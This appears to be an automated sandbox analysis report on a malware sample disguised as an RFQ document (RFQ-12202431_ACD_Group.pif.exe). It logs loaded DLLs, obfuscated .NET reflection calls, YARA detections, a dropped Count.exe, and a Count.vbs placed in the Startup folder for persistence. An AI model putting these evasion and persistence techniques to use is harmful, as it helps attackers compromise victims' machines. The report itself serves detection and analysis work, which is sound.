Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Count.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: RFQ-12202431_ACD_Group.pif.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: RFQ-12202431_ACD_Group.pif.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390302174360.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390302174360.00000000049C7000.00000004.00000800.00020000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390312248341.0000000006DA0000.00000004.08000000.00040000.00000000.sdmp, Count.exe, 00000004.00000002.390523023200.000000000464C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390302174360.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390302174360.00000000049C7000.00000004.00000800.00020000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390312248341.0000000006DA0000.00000004.08000000.00040000.00000000.sdmp, Count.exe, 00000004.00000002.390523023200.000000000464C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390311376969.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.390311376969.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.43661c8.6.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	.Net Code: Type.GetTypeFromHandle(ravIc3H3HKbiWyUXbrv.dtdGHqdLec(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(ravIc3H3HKbiWyUXbrv.dtdGHqdLec(16777252)),Type.GetTypeFromHandle(ravIc3H3HKbiWyUXbrv.dtdGHqdLec(16777284))})
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4cf9c40.3.raw.unpack, YivfexVWZI1iWQ36XG.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.449a5e8.4.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	.Net Code: Type.GetTypeFromHandle(ravIc3H3HKbiWyUXbrv.dtdGHqdLec(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(ravIc3H3HKbiWyUXbrv.dtdGHqdLec(16777252)),Type.GetTypeFromHandle(ravIc3H3HKbiWyUXbrv.dtdGHqdLec(16777284))})

.NET source code contains potential unpacker

Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6da0000.11.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6da0000.11.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6da0000.11.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6be0000.9.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6be0000.9.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6be0000.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6be0000.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6be0000.9.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4b3e758.7.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4b3e758.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4b3e758.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.RFQ-12202431_ACD_Group.pif.exe.6cc0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Count.exe.41b7428.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQ-12202431_ACD_Group.pif.exe.449a5e8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQ-12202431_ACD_Group.pif.exe.43661c8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4231da0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.390523023200.00000000041B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.390292373562.000000000300C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.390311703554.0000000006CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.390504748872.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.390302174360.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RFQ-12202431_ACD_Group.pif.exe PID: 3052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Count.exe PID: 1648, type: MEMORYSTR

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_02EA6C89 push ebp; ret	0_2_02EA6C90
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_05F12500 pushfd ; iretd	0_2_05F12501
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_05F18CA3 push BA02E09Fh; retf 0001h	0_2_05F18CA8
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_05F18F60 push BA02E09Fh; retf	0_2_05F18F65
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C39DE0 pushad ; iretd	0_2_06C3A0A9
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C33D90 push es; ret	0_2_06C33E40
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C398D1 pushfd ; ret	0_2_06C398D4
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C40AB6 push BA02E09Fh; retn 0002h	0_2_06C40ABB
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C41425 push BA02E09Fh; retn 0002h	0_2_06C4143D
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C46D9D push es; ret	0_2_06C46DA4
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06C411B3 push BA02E09Fh; retn 0002h	0_2_06C411BD
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06D9CC0F push es; retf	0_2_06D9CC10
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06D91BB0 push es; ret	0_2_06D91BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_00FA35D8 pushad ; retf	2_2_00FA35D9
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_00F16C89 push ebp; ret	4_2_00F16C90
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_05882500 pushfd ; iretd	4_2_05882501
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_05887640 push BA00EC9Fh; retf	4_2_05887645
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_05887383 push BA00EC9Fh; retf 0001h	4_2_05887388
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066E9DE0 pushad ; iretd	4_2_066EA0A9
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066E3D90 push es; ret	4_2_066E3E40
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066E6AD4 push eax; retf	4_2_066E6AD5
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066E69C0 push ecx; retf	4_2_066E69C1
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066F0AB6 push BA00EC9Fh; retn 0002h	4_2_066F0ABB
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066F2B2D push es; retf	4_2_066F2BEC
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066F1425 push BA00EC9Fh; retn 0002h	4_2_066F143D
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_066F11B3 push BA00EC9Fh; retn 0002h	4_2_066F11BD
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_068238AA pushfd ; retf	4_2_068238B1
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06822982 pushfd ; ret	4_2_06822989
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0684CC0F push es; retf	4_2_0684CC10
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_0684FC6F push es; retf	4_2_0684FC8C
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06841BB0 push es; ret	4_2_06841BC0

Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.43661c8.6.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	High entropy of concatenated method names: 'MrHlkkePfFkMuI69WAV', 'inT42qecubhyQxIxv6P', 'KLFHjvdgqF', 'vh0ry9Sq2v', 'P3gHw7W2LC', 'hoBHveppek', 'vw0HgfQcXQ', 'hZLHilPCp7', 'AVmGFJKnFE', 'e7gFDZRtIV'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.43661c8.6.raw.unpack, IINOltnMJm5Uo3kpLAr.cs	High entropy of concatenated method names: 'tW1nK8MUGV', 'ztJnS1TEDZ', 'VSZnE1n5PJ', 'UuXnlx6CIi', 'uI6nh4CXvs', 'AGBnJCvnFB', 'sggn6phpxR', 'D9KnYVUvlD', 'REcnsBIdd3', 'D9pnwG0H45'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.43661c8.6.raw.unpack, fxNqEWB2LfJo2gKnZg0.cs	High entropy of concatenated method names: 'vdYxLSnK6W', 'rO4xX9XM2A', 'ubTx4ba3B9', 'cnbxRneRSD', 's5mxntSj76', 'jsDxPyxThw', 'cs6xcKH0j5', 'Hm0BN8O0Dx', 'SpIxQkxBA7', 'V8hxFnNEK8'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.43661c8.6.raw.unpack, Qe5XSqHq7hMHqjVS1vL.cs	High entropy of concatenated method names: 'HI6BueF41X', 'EhIBLYkJLO', 'lqLBXbMSIP', 'dLcB4KXZh1', 'GxmBR1DIhE', 'iyyBnxhFQU', 'bKuBP1ncfD', 'khnBclpQuj', 'y9sBQI8kRb', 'cRLBFxEjrK'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4cf9c40.3.raw.unpack, YivfexVWZI1iWQ36XG.cs	High entropy of concatenated method names: 'zy674Hvodp5WgKo0wUw', 'wXvbAmvFe4QHOuBt5dU', 'n2LozW0HDq', 'vh0ry9Sq2v', 'qZXFgXBBGU', 'u5ZF9RQ3ef', 'XHOFjxA6O9', 'iwAFuk1BfX', 'iYoIIVUmOA', 'gIKHsmJtv'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4cf9c40.3.raw.unpack, sOkSXXFJauWqYlU8epA.cs	High entropy of concatenated method names: 'GHNFklihaU', 'YDDF55uUAb', 'p7TFQaFsHV', 'KYhFGBkadx', 'okAFAA2ZB4', 'yVrFCPigcR', 'K4HFlOyp75', 'gjcFWj9JLH', 'p0yFN6iO7Y', 'DSlFsj0du9'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.449a5e8.4.raw.unpack, nKT5oBF8yKjsf8VMsKp.cs	High entropy of concatenated method names: 'MrHlkkePfFkMuI69WAV', 'inT42qecubhyQxIxv6P', 'KLFHjvdgqF', 'vh0ry9Sq2v', 'P3gHw7W2LC', 'hoBHveppek', 'vw0HgfQcXQ', 'hZLHilPCp7', 'AVmGFJKnFE', 'e7gFDZRtIV'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.449a5e8.4.raw.unpack, IINOltnMJm5Uo3kpLAr.cs	High entropy of concatenated method names: 'tW1nK8MUGV', 'ztJnS1TEDZ', 'VSZnE1n5PJ', 'UuXnlx6CIi', 'uI6nh4CXvs', 'AGBnJCvnFB', 'sggn6phpxR', 'D9KnYVUvlD', 'REcnsBIdd3', 'D9pnwG0H45'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.449a5e8.4.raw.unpack, fxNqEWB2LfJo2gKnZg0.cs	High entropy of concatenated method names: 'vdYxLSnK6W', 'rO4xX9XM2A', 'ubTx4ba3B9', 'cnbxRneRSD', 's5mxntSj76', 'jsDxPyxThw', 'cs6xcKH0j5', 'Hm0BN8O0Dx', 'SpIxQkxBA7', 'V8hxFnNEK8'
Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.449a5e8.4.raw.unpack, Qe5XSqHq7hMHqjVS1vL.cs	High entropy of concatenated method names: 'HI6BueF41X', 'EhIBLYkJLO', 'lqLBXbMSIP', 'dLcB4KXZh1', 'GxmBR1DIhE', 'iyyBnxhFQU', 'bKuBP1ncfD', 'khnBclpQuj', 'y9sBQI8kRb', 'cRLBFxEjrK'

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

File created: C:\Users\user\AppData\Roaming\Count.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
